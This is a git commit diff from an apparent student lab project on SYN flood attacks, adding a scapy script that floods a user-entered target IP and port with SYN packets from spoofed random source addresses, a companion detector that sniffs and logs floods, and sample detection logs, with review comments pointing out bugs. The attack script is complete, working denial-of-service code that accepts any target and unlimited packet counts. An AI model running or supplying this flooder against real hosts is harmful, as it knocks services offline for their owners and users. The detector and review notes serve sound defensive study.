Adding project files
fouadtrad authored Oct 3, 2022
1 parent beea9c3 commit 1643928
Showing 4 changed files with 774 additions and 0 deletions.
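--- a/Attack.py
+++ b/Attack.py
@@ -0,0 +1,158 @@
+import ipaddress
+from operator import sub
+from tabnanny import verbose
+from scapy.all import *
+import os
+import random
+import socket
+import netifaces
+
+
+
+def getSubnet(ip): #mohammad
+interfaces = netifaces.interfaces()
+subnetmask = ""
+for iface in interfaces:
+interface = netifaces.ifaddresses(iface)
+if(2 in interface.keys()):
+physicalInterface = interface[2][0]
+if(ip in physicalInterface.values()):
+subnetmask = physicalInterface['netmask']
+return subnetmask
+
+
+
+def getLocalIP(target,port): #chadi
+s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
+s.connect(("192.168.1.122", 80))
+ip = s.getsockname()[0]
+s.close()
+return ip
+
+
+def getNetwork(target,port): #mohammad
+ip = getLocalIP(target,port)
+subnet = getSubnet(ip)
+network = ipaddress.IPv4Network(ip+"/"+subnet,strict=False)
+return network
+
+def random_ip(network): #chadi
+network = ipaddress.IPv4Network(network)
+network_int, = struct.unpack("!I", network.network_address.packed) # make network address into an integer
+rand_bits = network.max_prefixlen - network.prefixlen # calculate the needed bits for the host part
+rand_host_int = random.randint(0, 2**rand_bits - 1) # generate random host part
+ip_address = ipaddress.IPv4Address(network_int + rand_host_int) # combine the parts
+return ip_address.exploded
+
+
+def SYN_DOS(destIP,destPort,counter,singleIPBool, subIPBool): #chadi
+total = 0
+network = getNetwork(destIP,destIP)
+if singleIPBool and subIPBool:
+src_IP = random_ip(network)
+print("Attacking from {}",src_IP)
+
+elif singleIPBool and not subIPBool:
+src_IP = random_ip('0.0.0.0/0')
+print("Attacking from {}",src_IP)
+
+else:
+print("Attacking from multiple IPs")
+
+while(total < counter or counter == -1):
+sport= random.randint(1000,9000)
+seq= random.randint(1000,9000)
+window= random.randint(1000,9000)
+
+IP_Packet = IP() #Declaring an IP packet
+
+#Assign the IP address depending on whether it should be fixed or not
+if singleIPBool:
+IP_Packet.src = src_IP
+else:
+IP_Packet.src = random_ip(network) if subIPBool else random_ip('0.0.0.0/0')
+
+IP_Packet.dst = destIP #Using the IP address inserted by the attacker (the destination)
+
+TCP_Packet = TCP()
+TCP_Packet.sport = sport #Using a random port
+TCP_Packet.seq = seq #Using a random sequency number
+TCP_Packet.window = window #Using a random window size
+TCP_Packet.dport = destPort #Using the port number inserted by the attacker
+TCP_Packet.flags = "S" #S flag implying a SYN packet to be sent
+
+packet_to_send = IP_Packet/TCP_Packet
+send(packet_to_send , verbose=0) #Stacking up the layers
+total +=1
+print(str(total) + " Packets Sent",end='\r') #printing number of packets sent
+time.sleep(0.01)
+
+
+def getDestPort(): #mohammad
+while(True):
+destPort = input("Target Port: ")
+try:
+destPort = int(destPort) #keep looping until integer
+return destPort
+except ValueError:
+print("Please Enter Integer")
+
+
+def getNumofPackets(): #mohammad
+while(True):
+counter = input("How many packets to send (INF/inf for continuous): ")
+if(counter == "INF" or counter == 'inf'): #special value for inf
+return -1
+else:
+try:
+counter = int(counter) #keep looping until integer
+return counter
+except ValueError:
+print("Please Enter Correct Value")
+
+def getifSingleIP(): #mohammad
+
+while(True): #keep looping until y/n
+singleIP = input("Do you want to use a single IP for the attack (Y/N)? ")
+if(singleIP == "Y" or singleIP == "y"):
+return True
+elif (singleIP =="N" or singleIP =="n"):
+return False
+else:
+print("Please Enter Correct Value")
+
+def getifSameSubnet(): #mohammad
+
+while(True): #keep looping until y/n
+sameSub = input("Do you want the spoofed IP to be on the same subnet (Y/N)? ")
+if(sameSub == "Y" or sameSub == "y"):
+return True
+elif (sameSub =="N" or sameSub =="n"):
+return False
+else:
+print("Please Enter Correct Value")
+
+def getDestIP(): #Fouad
+yourIP = input("Do you want to use your own IP as a victim (Y/N)? ")
+
+if(yourIP == "Y" or yourIP == "y"):
+destIP = get_if_addr(conf.iface)
+return destIP
+
+elif (yourIP =="N" or yourIP =="n"):
+destIP = input("Target IP: ")
+return destIP
+else:
+print("Please Enter Correct Value")
+
+def main(): #mohammad/chadi
+os.system("cls") #Clearing the screen
+destIP = getDestIP()
+print("Destination IP is {}".format(destIP))
+destPort = getDestPort()
+counter = getNumofPackets()
+singleIPBool = getifSingleIP()
+subIPBool = getifSameSubnet()
+SYN_DOS(destIP,destPort,counter,singleIPBool, subIPBool)
+
+main()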
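Review bot: `main()` on the last line runs unconditionally, so merely importing Attack.py starts the prompts and the packet loop; it should be wrapped as `if __name__ == "__main__": main()`. The file also has no module docstring stating its purpose, which from the companion Detection.py and the committed sample log appears to be generating test traffic for the detector in a lab. `getDestIP` returns whatever is typed at `Target IP:` without validation, and returns None for any answer other than Y/N, unlike the other prompt helpers, which loop. Given that apparent purpose, I would add the docstring and reject targets outside the test network, e.g. `if not ipaddress.ip_address(destIP).is_private: raise SystemExit("lab targets only")`.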
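--- a/Detection.py
+++ b/Detection.py
@@ -0,0 +1,83 @@
+from scapy.all import *
+from collections import Counter
+from time import localtime, strftime
+import logging
+import os
+
+
+# Anthony
+synCount = Counter()
+ackCount = Counter()
+logging.basicConfig(filename='traffic_analysis.log', format='%(message)s', level=logging.INFO)
+
+
+# Layan
+def analyze (pkt):
+
+#check if IP layer is present in packet
+if IP in pkt:
+protocol = pkt.getlayer(2).name
+
+#Only analyze packets that are destined to my specific host
+if protocol=='TCP' and pkt['IP'].dst == myIP:
+
+if pkt['TCP'].flags.S and pkt['TCP'].dport == port:
+src = pkt['IP'].src
+synCount[src] += 1
+
+if pkt['TCP'].flags.A and pkt['TCP'].dport == port:
+src = pkt['IP'].src
+ackCount[src] += 1
+
+
+# Anthony/Layan
+def loggingFnt():
+
+# Anthony
+while True:
+dateTime = strftime("%d/%m/%Y , %H:%M:%S ,", localtime())
+logString = dateTime + " Everything is normal"
+time.sleep(3.5)
+if len(synCount) > 0:
+if (synCount.most_common(1)[0][1] > 3 * ackCount[synCount.most_common(1)[0][0]])and((synCount.most_common(1)[0][1]/sum(synCount.values()))*100 > 80):
+logString = dateTime + " SYN attack detected! Attacker IP: " + str(synCount.most_common(1)[0][0]) + " No. of attempts: " + str(synCount.most_common(1)[0][1])
+
+# Layan
+elif len(synCount) > 5*len(ackCount) : #Check for half open connections
+#else:
+logString = dateTime + " SYN attack detected! From multiple IPs "
+logging.info(logString)
+synCount.clear()
+ackCount.clear()
+
+# Anthony
+loggingThread=threading.Thread(target=loggingFnt)
+loggingThread.daemon=True
+loggingThread.start()
+
+# Fouad
+os.system("cls") #Clearing the screen
+s = socket.socket() # Create a socket object
+myIP = get_if_addr(conf.iface) # get ip address of default interface
+port = 12345 # Reserve a port for your service
+s.bind((myIP, port))
+s.listen()
+def listen():
+def run(self):
+Client, address = s.accept()
+print('Connected to: ' + address[0] + ':' + str(address[1]))
+
+
+# Anthony
+listenerThread=threading.Thread(target=listen)
+listenerThread.daemon=True
+listenerThread.start()
+
+print("Server is listening on {}:{}".format(myIP, port))
+
+# Layan
+# sniff on loopback (for testing on one device) and default interface (for testing from 2 devices)
+sniffer = AsyncSniffer(prn=analyze, store=0, iface = ["\\Device\\NPF_Loopback", conf.iface])
+sniffer.start()
+while True:
+time.sleep(1)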
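Review bot: The address written after `Attacker IP:` in `loggingFnt` is `pkt['IP'].src`, a field the sender of a SYN flood sets freely, so the log should not present it as the attacker; the committed sample log records 145.63.155.238 for the run labelled "single IP different subnet", which looks like a generated source rather than a real host. I would word the message as `" SYN flood suspected; claimed source IP (may be spoofed): "` and keep that field out of any blocking decision. The same branch has no minimum count, so a single SYN whose ACK arrives after `synCount.clear()` satisfies both `> 3 * ackCount[...]` (1 > 0) and the 80% share test; add a floor such as `top_count >= MIN_SYN_PER_WINDOW`, with the threshold as a named constant. Separately, `listen()` only defines a nested `run(self)` and never calls it, so `s.accept()` is never reached. `synCount` and `ackCount` are also updated by the sniffer callback and cleared by the logging thread without a lock.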
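--- a/traffic_analysis_one_device.log
+++ b/traffic_analysis_one_device.log
@@ -0,0 +1,127 @@
+03/10/2022 , 20:31:31 , Everything is normal
+03/10/2022 , 21:38:00 , Everything is normal
+03/10/2022 , 21:38:04 , Everything is normal
+03/10/2022 , 21:38:07 , Everything is normal
+03/10/2022 , 21:38:11 , Everything is normal
+03/10/2022 , 21:38:14 , Everything is normal
+03/10/2022 , 21:38:18 , Everything is normal
+03/10/2022 , 21:38:21 , Everything is normal
+03/10/2022 , 21:38:25 , Everything is normal
+03/10/2022 , 21:38:28 , Everything is normal
+03/10/2022 , 21:38:32 , Everything is normal
+03/10/2022 , 21:38:35 , Everything is normal
+03/10/2022 , 21:38:39 , Everything is normal
+03/10/2022 , 21:38:42 , Everything is normal
+03/10/2022 , 21:38:46 , Everything is normal
+
+single IP same subnet
+
+03/10/2022 , 21:38:49 , SYN attack detected! Attacker IP: 172.20.10.4 No. of attempts: 9
+03/10/2022 , 21:38:53 , SYN attack detected! Attacker IP: 172.20.10.4 No. of attempts: 132
+03/10/2022 , 21:38:56 , SYN attack detected! Attacker IP: 172.20.10.4 No. of attempts: 131
+03/10/2022 , 21:39:00 , SYN attack detected! Attacker IP: 172.20.10.4 No. of attempts: 123
+03/10/2022 , 21:39:03 , SYN attack detected! Attacker IP: 172.20.10.4 No. of attempts: 124
+03/10/2022 , 21:39:07 , SYN attack detected! Attacker IP: 172.20.10.4 No. of attempts: 123
+03/10/2022 , 21:39:10 , SYN attack detected! Attacker IP: 172.20.10.4 No. of attempts: 132
+03/10/2022 , 21:39:14 , SYN attack detected! Attacker IP: 172.20.10.4 No. of attempts: 117
+03/10/2022 , 21:39:17 , SYN attack detected! Attacker IP: 172.20.10.4 No. of attempts: 126
+03/10/2022 , 21:39:21 , SYN attack detected! Attacker IP: 172.20.10.4 No. of attempts: 133
+03/10/2022 , 21:39:24 , SYN attack detected! Attacker IP: 172.20.10.4 No. of attempts: 97
+03/10/2022 , 21:39:28 , Everything is normal
+03/10/2022 , 21:39:31 , Everything is normal
+03/10/2022 , 21:39:35 , Everything is normal
+03/10/2022 , 21:39:38 , Everything is normal
+03/10/2022 , 21:39:42 , Everything is normal
+03/10/2022 , 21:39:45 , Everything is normal
+03/10/2022 , 21:39:49 , Everything is normal
+03/10/2022 , 21:39:52 , Everything is normal
+03/10/2022 , 21:39:56 , Everything is normal
+03/10/2022 , 21:39:59 , Everything is normal
+
+multiple IPs same subnet
+
+03/10/2022 , 21:40:03 , SYN attack detected! From multiple IPs
+03/10/2022 , 21:40:06 , SYN attack detected! From multiple IPs
+03/10/2022 , 21:40:10 , SYN attack detected! From multiple IPs
+03/10/2022 , 21:40:13 , SYN attack detected! From multiple IPs
+03/10/2022 , 21:40:17 , SYN attack detected! From multiple IPs
+03/10/2022 , 21:40:20 , SYN attack detected! From multiple IPs
+03/10/2022 , 21:40:24 , SYN attack detected! From multiple IPs
+03/10/2022 , 21:40:28 , SYN attack detected! From multiple IPs
+03/10/2022 , 21:40:31 , SYN attack detected! From multiple IPs
+03/10/2022 , 21:40:35 , SYN attack detected! From multiple IPs
+03/10/2022 , 21:40:38 , SYN attack detected! From multiple IPs
+03/10/2022 , 21:40:42 , SYN attack detected! From multiple IPs
+03/10/2022 , 21:40:45 , SYN attack detected! From multiple IPs
+03/10/2022 , 21:40:49 , Everything is normal
+03/10/2022 , 21:40:52 , Everything is normal
+03/10/2022 , 21:40:56 , Everything is normal
+03/10/2022 , 21:40:59 , Everything is normal
+03/10/2022 , 21:41:03 , Everything is normal
+03/10/2022 , 21:41:06 , Everything is normal
+03/10/2022 , 21:41:10 , Everything is normal
+03/10/2022 , 21:41:13 , Everything is normal
+03/10/2022 , 21:41:17 , Everything is normal
+03/10/2022 , 21:41:20 , Everything is normal
+03/10/2022 , 21:41:24 , Everything is normal
+03/10/2022 , 21:41:27 , Everything is normal
+03/10/2022 , 21:41:31 , Everything is normal
+03/10/2022 , 21:41:34 , Everything is normal
+03/10/2022 , 21:41:38 , Everything is normal
+03/10/2022 , 21:41:41 , Everything is normal
+03/10/2022 , 21:41:45 , Everything is normal
+03/10/2022 , 21:41:48 , Everything is normal
+03/10/2022 , 21:41:52 , Everything is normal
+03/10/2022 , 21:41:55 , Everything is normal
+03/10/2022 , 21:41:59 , Everything is normal
+03/10/2022 , 21:42:02 , Everything is normal
+
+single IP different subnet
+
+03/10/2022 , 21:42:06 , SYN attack detected! Attacker IP: 145.63.155.238 No. of attempts: 100
+03/10/2022 , 21:42:09 , SYN attack detected! Attacker IP: 145.63.155.238 No. of attempts: 118
+03/10/2022 , 21:42:13 , SYN attack detected! Attacker IP: 145.63.155.238 No. of attempts: 104
+03/10/2022 , 21:42:16 , SYN attack detected! Attacker IP: 145.63.155.238 No. of attempts: 123
+03/10/2022 , 21:42:20 , SYN attack detected! Attacker IP: 145.63.155.238 No. of attempts: 77
+03/10/2022 , 21:42:23 , SYN attack detected! Attacker IP: 145.63.155.238 No. of attempts: 97
+03/10/2022 , 21:42:27 , SYN attack detected! Attacker IP: 145.63.155.238 No. of attempts: 92
+03/10/2022 , 21:42:30 , SYN attack detected! Attacker IP: 145.63.155.238 No. of attempts: 125
+03/10/2022 , 21:42:34 , SYN attack detected! Attacker IP: 145.63.155.238 No. of attempts: 92
+03/10/2022 , 21:42:38 , SYN attack detected! Attacker IP: 145.63.155.238 No. of attempts: 114
+03/10/2022 , 21:42:41 , SYN attack detected! Attacker IP: 145.63.155.238 No. of attempts: 138
+03/10/2022 , 21:42:45 , SYN attack detected! Attacker IP: 145.63.155.238 No. of attempts: 45
+03/10/2022 , 21:42:48 , Everything is normal
+03/10/2022 , 21:42:52 , Everything is normal
+03/10/2022 , 21:42:55 , Everything is normal
+03/10/2022 , 21:42:59 , Everything is normal
+03/10/2022 , 21:43:02 , Everything is normal
+03/10/2022 , 21:43:06 , Everything is normal
+03/10/2022 , 21:43:09 , Everything is normal
+03/10/2022 , 21:43:13 , Everything is normal
+03/10/2022 , 21:43:16 , Everything is normal
+
+multiple IPs different subnet
+
+03/10/2022 , 21:43:20 , SYN attack detected! From multiple IPs
+03/10/2022 , 21:43:23 , SYN attack detected! From multiple IPs
+03/10/2022 , 21:43:27 , SYN attack detected! From multiple IPs
+03/10/2022 , 21:43:30 , SYN attack detected! From multiple IPs
+03/10/2022 , 21:43:34 , SYN attack detected! From multiple IPs
+03/10/2022 , 21:43:37 , SYN attack detected! From multiple IPs
+03/10/2022 , 21:43:41 , SYN attack detected! From multiple IPs
+03/10/2022 , 21:43:44 , SYN attack detected! From multiple IPs
+03/10/2022 , 21:43:48 , SYN attack detected! From multiple IPs
+03/10/2022 , 21:43:51 , SYN attack detected! From multiple IPs
+03/10/2022 , 21:43:55 , SYN attack detected! From multiple IPs
+03/10/2022 , 21:43:58 , Everything is normal
+03/10/2022 , 21:44:02 , Everything is normal
+03/10/2022 , 21:44:05 , Everything is normal
+03/10/2022 , 21:44:09 , Everything is normal
+03/10/2022 , 21:44:12 , Everything is normal
+03/10/2022 , 21:44:16 , Everything is normal
+03/10/2022 , 21:44:19 , Everything is normal
+03/10/2022 , 21:44:23 , Everything is normal
+03/10/2022 , 21:44:26 , Everything is normal
+03/10/2022 , 21:44:30 , Everything is normal
+03/10/2022 , 21:44:33 , Everything is normal
+03/10/2022 , 21:44:37 , Everything is normal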